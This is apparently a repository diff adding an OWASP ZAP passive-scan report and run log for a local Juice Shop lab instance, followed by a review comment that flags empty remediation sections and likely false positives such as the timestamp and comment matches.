+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/main.js
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Embedder-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/main.js
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+ Cross-Origin-Opener-Policy
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 24
+
+
+
+ Solution
+
+
+
+
+
+
+ Reference
+
+ https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Cross-Origin-Embedder-Policy
+
+
+
+
+ CWE Id
+ 693
+
+
+ WASC Id
+ 14
+
+
+ Plugin Id
+ 90004
+
+
+
+
+
+
+
+
+ Timestamp Disclosure - Unix
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1650485437
+
+
+
+ Other Info
+ 1650485437, which evaluates to: 2022-04-20 20:10:37.
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1981395349
+
+
+
+ Other Info
+ 1981395349, which evaluates to: 2032-10-14 19:35:49.
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 2038834951
+
+
+
+ Other Info
+ 2038834951, which evaluates to: 2034-08-10 15:02:31.
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1650485437
+
+
+
+ Other Info
+ 1650485437, which evaluates to: 2022-04-20 20:10:37.
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1981395349
+
+
+
+ Other Info
+ 1981395349, which evaluates to: 2032-10-14 19:35:49.
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 2038834951
+
+
+
+ Other Info
+ 2038834951, which evaluates to: 2034-08-10 15:02:31.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1650485437
+
+
+
+ Other Info
+ 1650485437, which evaluates to: 2022-04-20 20:10:37.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1680327869
+
+
+
+ Other Info
+ 1680327869, which evaluates to: 2023-04-01 05:44:29.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1701244813
+
+
+
+ Other Info
+ 1701244813, which evaluates to: 2023-11-29 08:00:13.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1818181818
+
+
+
+ Other Info
+ 1818181818, which evaluates to: 2027-08-13 18:30:18.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1839622642
+
+
+
+ Other Info
+ 1839622642, which evaluates to: 2028-04-17 22:17:22.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1863874346
+
+
+
+ Other Info
+ 1863874346, which evaluates to: 2029-01-23 14:52:26.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1917098446
+
+
+
+ Other Info
+ 1917098446, which evaluates to: 2030-10-01 15:20:46.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 1981395349
+
+
+
+ Other Info
+ 1981395349, which evaluates to: 2032-10-14 19:35:49.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 2033195021
+
+
+
+ Other Info
+ 2033195021, which evaluates to: 2034-06-06 08:23:41.
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 2038834951
+
+
+
+ Other Info
+ 2038834951, which evaluates to: 2034-08-10 15:02:31.
+
+
+ Instances
+
+
+ 16
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+ https://cwe.mitre.org/data/definitions/200.html
+
+
+
+
+ CWE Id
+ 497
+
+
+ WASC Id
+ 13
+
+
+ Plugin Id
+ 10096
+
+
+
+
+
+
+
+
+ ZAP is Out of Date
+
+
+ Description
+
+
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+ The latest version of ZAP is 2.17.0
+
+
+ Instances
+
+
+ 1
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+ https://www.zaproxy.org/download/
+
+
+
+
+ CWE Id
+ 1104
+
+
+ WASC Id
+ 45
+
+
+ Plugin Id
+ 10116
+
+
+
+
+
+
+
+
+ Information Disclosure - Suspicious Comments
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000/main.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ query
+
+
+
+ Other Info
+ The following pattern was used: \bQUERY\b and was detected in likely comment: "//owasp.org' target='_blank'>Open Worldwide Application Security Project (OWASP)</a> and is developed and maintained by voluntee", see evidence field for the suspicious comment/snippet.
+
+
+
+ URL
+ http://localhost:3000/vendor.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ Query
+
+
+
+ Other Info
+ The following pattern was used: \bQUERY\b and was detected in likely comment: "//www.w3.org/2000/svg" viewBox="0 0 512 512"><path d="M0 256C0 397.4 114.6 512 256 512s256-114.6 256-256S397.4 0 256 0S0 114.6 0", see evidence field for the suspicious comment/snippet.
+
+
+ Instances
+
+
+ 2
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+
+
+ CWE Id
+ 615
+
+
+ WASC Id
+ 13
+
+
+ Plugin Id
+ 10027
+
+
+
+
+
+
+
+
+ Modern Web Application
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:59:18
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/build/routes/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/assets/public/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:328:13
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/index.js:376:14
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/main.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/polyfills.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/runtime.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/express/lib/router/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/juice-shop/node_modules/serve-index/assets/public/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ <script src="//cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.1.0/cookieconsent.min.js"></script>
+
+
+
+ Other Info
+ No links have been found while there are scripts, which is an indication that this is a modern web application.
+
+
+ Instances
+
+
+ 14
+
+
+
+ Solution
+
+
+
+
+ Reference
+
+
+
+ CWE Id
+
+
+
+ WASC Id
+
+
+
+ Plugin Id
+ 10109
+
+
+
+
+
+
+
+
+ Non-Storable Content
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000/ftp/eastere.gg
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 403
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/encrypt.pyc
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 403
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/package.json.bak
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ 403
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 3
+
+
+
+ Solution
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ Reference
+
+ https://datatracker.ietf.org/doc/html/rfc7234
+
+
+
+ https://datatracker.ietf.org/doc/html/rfc7231
+
+
+ https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
+
+
+
+ CWE Id
+ 524
+
+
+ WASC Id
+ 13
+
+
+ Plugin Id
+ 10049
+
+
+
+
+
+
+
+
+ Storable and Cacheable Content
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000/robots.txt
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+
+
+
+
+ Other Info
+ In the absence of an explicitly specified caching lifetime directive in the response, a liberal lifetime heuristic of 1 year was assumed. This is permitted by rfc7234.
+
+
+ Instances
+
+
+ 1
+
+
+
+ Solution
+
+
+
+
+
+
+
+
+
+
+
+
+ Reference
+
+ https://datatracker.ietf.org/doc/html/rfc7234
+
+
+
+ https://datatracker.ietf.org/doc/html/rfc7231
+
+
+ https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
+
+
+
+ CWE Id
+ 524
+
+
+ WASC Id
+ 13
+
+
+ Plugin Id
+ 10049
+
+
+
+
+
+
+
+
+
+
+
+
+ Storable but Non-Cacheable Content
+
+
+ Description
+
+
+
+
+
+
+
+
+
+ URL
+ http://localhost:3000
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/assets/public/favicon_js.ico
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/acquisitions.md
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/incident-support.kdbx
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/ftp/legal.md
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/main.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/polyfills.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/runtime.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/sitemap.xml
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/styles.css
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+
+ URL
+ http://localhost:3000/vendor.js
+
+
+ Method
+ GET
+
+
+ Parameter
+
+
+
+ Attack
+
+
+
+ Evidence
+ max-age=0
+
+
+
+ Other Info
+
+
+
+ Instances
+
+
+ 11
+
+
+
+ Solution
+
+
+
+ Reference
+
+ https://datatracker.ietf.org/doc/html/rfc7234
+
+
+
+ https://datatracker.ietf.org/doc/html/rfc7231
+
+
+ https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
+
+
+
+ CWE Id
+ 524
+
+
+ WASC Id
+ 13
+
+
+ Plugin Id
+ 10049
+ Sequence Details
+ With the associated active scan results.
+
+
+
+
+
+
+
+
+
+
+
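Review bot: every alert in this rendered report has an empty Description and Solution block (for example the Solution under "Cross-Domain JavaScript Source File Inclusion" and the Description under "Dangerous JS Functions"), so the file carries instance lists but none of the remediation text ZAP normally emits; regenerate it with the description and solution sections included, or keep the JSON report as the source of truth and drop this rendering. Several instances also read as false positives that deserve a triage note rather than a raw commit: the "Information Disclosure - Suspicious Comments" matches hit the word "query" inside an HTML anchor and an SVG path, not a comment, and the "Timestamp Disclosure - Unix" values pulled from styles.css (1818181818, 1839622642 and similar) are far more likely to be numeric literals in minified CSS than real timestamps. The findings that matter for the lab are the missing Cross-Origin-Embedder-Policy and Cross-Origin-Opener-Policy headers, the deprecated Feature-Policy header, and the cdnjs script includes loaded from a third-party domain; the lab notes should say which of these the exercise intends to fix.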
diff --git a/labs/lab5/zap/zap-auth-run.log b/labs/lab5/zap/zap-auth-run.log
new file mode 100644
index 00000000..2a039657
--- /dev/null
+++ b/labs/lab5/zap/zap-auth-run.log
@@ -0,0 +1,114 @@
+Using the Automation Framework
+Total of 95 URLs
+PASS: Vulnerable JS Library (Powered by Retire.js) [10003]
+PASS: In Page Banner Information Leak [10009]
+PASS: Cookie No HttpOnly Flag [10010]
+PASS: Cookie Without Secure Flag [10011]
+PASS: Re-examine Cache-control Directives [10015]
+PASS: Content-Type Header Missing [10019]
+PASS: Anti-clickjacking Header [10020]
+PASS: X-Content-Type-Options Header Missing [10021]
+PASS: Information Disclosure - Debug Error Messages [10023]
+PASS: Information Disclosure - Sensitive Information in URL [10024]
+PASS: Information Disclosure - Sensitive Information in HTTP Referrer Header [10025]
+PASS: HTTP Parameter Override [10026]
+PASS: Off-site Redirect [10028]
+PASS: Cookie Poisoning [10029]
+PASS: User Controllable Charset [10030]
+PASS: User Controllable HTML Element Attribute (Potential XSS) [10031]
+PASS: Viewstate [10032]
+PASS: Directory Browsing [10033]
+PASS: Heartbleed OpenSSL Vulnerability (Indicative) [10034]
+PASS: Strict-Transport-Security Header [10035]
+PASS: HTTP Server Response Header [10036]
+PASS: Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s) [10037]
+PASS: X-Backend-Server Header Information Leak [10039]
+PASS: Secure Pages Include Mixed Content [10040]
+PASS: HTTP to HTTPS Insecure Transition in Form Post [10041]
+PASS: HTTPS to HTTP Insecure Transition in Form Post [10042]
+PASS: User Controllable JavaScript Event (XSS) [10043]
+PASS: Big Redirect Detected (Potential Sensitive Information Leak) [10044]
+PASS: Retrieved from Cache [10050]
+PASS: X-ChromeLogger-Data (XCOLD) Header Information Leak [10052]
+PASS: Cookie without SameSite Attribute [10054]
+PASS: CSP [10055]
+PASS: X-Debug-Token Information Leak [10056]
+PASS: Username Hash Found [10057]
+PASS: X-AspNet-Version Response Header [10061]
+PASS: PII Disclosure [10062]
+PASS: Hash Disclosure [10097]
+PASS: Source Code Disclosure [10099]
+PASS: Weak Authentication Method [10105]
+PASS: Reverse Tabnabbing [10108]
+PASS: Authentication Request Identified [10111]
+PASS: Session Management Response Identified [10112]
+PASS: Verification Request Identified [10113]
+PASS: Script Served From Malicious Domain (polyfill) [10115]
+PASS: ZAP is Out of Date [10116]
+PASS: Absence of Anti-CSRF Tokens [10202]
+PASS: Private IP Disclosure [2]
+PASS: Session ID in URL Rewrite [3]
+PASS: Script Passive Scan Rules [50001]
+PASS: Stats Passive Scan Rule [50003]
+PASS: Insecure JSF ViewState [90001]
+PASS: Java Serialization Object [90002]
+PASS: Sub Resource Integrity Attribute Missing [90003]
+PASS: Charset Mismatch [90011]
+PASS: Application Error Disclosure [90022]
+PASS: WSDL File Detection [90030]
+PASS: Loosely Scoped Cookie [90033]
+WARN-NEW: Cross-Domain JavaScript Source File Inclusion [10017] x 10
+ http://localhost:3000 (200 OK)
+ http://localhost:3000 (200 OK)
+ http://localhost:3000/ (200 OK)
+ http://localhost:3000/ (200 OK)
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico (200 OK)
+WARN-NEW: Information Disclosure - Suspicious Comments [10027] x 2
+ http://localhost:3000/main.js (200 OK)
+ http://localhost:3000/vendor.js (200 OK)
+WARN-NEW: Content Security Policy (CSP) Header Not Set [10038] x 11
+ http://localhost:3000 (200 OK)
+ http://localhost:3000/ (200 OK)
+ http://localhost:3000/ftp (200 OK)
+ http://localhost:3000/ftp/coupons_2013.md.bak (403 Forbidden)
+ http://localhost:3000/ftp/encrypt.pyc (403 Forbidden)
+WARN-NEW: Non-Storable Content [10049] x 11
+ http://localhost:3000/ftp (200 OK)
+ http://localhost:3000/ftp/coupons_2013.md.bak (403 Forbidden)
+ http://localhost:3000/ftp/package-lock.json.bak (403 Forbidden)
+ http://localhost:3000/robots.txt (200 OK)
+ http://localhost:3000 (200 OK)
+WARN-NEW: Deprecated Feature Policy Header Set [10063] x 11
+ http://localhost:3000 (200 OK)
+ http://localhost:3000/ (200 OK)
+ http://localhost:3000/ftp (200 OK)
+ http://localhost:3000/ftp/coupons_2013.md.bak (403 Forbidden)
+ http://localhost:3000/ftp/encrypt.pyc (403 Forbidden)
+WARN-NEW: Timestamp Disclosure - Unix [10096] x 16
+ http://localhost:3000 (200 OK)
+ http://localhost:3000 (200 OK)
+ http://localhost:3000 (200 OK)
+ http://localhost:3000/sitemap.xml (200 OK)
+ http://localhost:3000/sitemap.xml (200 OK)
+WARN-NEW: Cross-Domain Misconfiguration [10098] x 10
+ http://localhost:3000 (200 OK)
+ http://localhost:3000/assets/public/favicon_js.ico (200 OK)
+ http://localhost:3000/ftp (200 OK)
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico (200 OK)
+ http://localhost:3000/main.js (200 OK)
+WARN-NEW: Modern Web Application [10109] x 11
+ http://localhost:3000 (200 OK)
+ http://localhost:3000/ (200 OK)
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico (200 OK)
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:43:13 (200 OK)
+ http://localhost:3000/juice-shop/build/routes/fileServer.js:59:18 (200 OK)
+WARN-NEW: Dangerous JS Functions [10110] x 2
+ http://localhost:3000/main.js (200 OK)
+ http://localhost:3000/vendor.js (200 OK)
+WARN-NEW: Insufficient Site Isolation Against Spectre Vulnerability [90004] x 10
+ http://localhost:3000 (200 OK)
+ http://localhost:3000/ (200 OK)
+ http://localhost:3000/ftp (200 OK)
+ http://localhost:3000/juice-shop/build/routes/assets/public/favicon_js.ico (200 OK)
+ http://localhost:3000/sitemap.xml (200 OK)
+FAIL-NEW: 0 FAIL-INPROG: 0 WARN-NEW: 10 WARN-INPROG: 0 INFO: 0 IGNORE: 0 PASS: 57
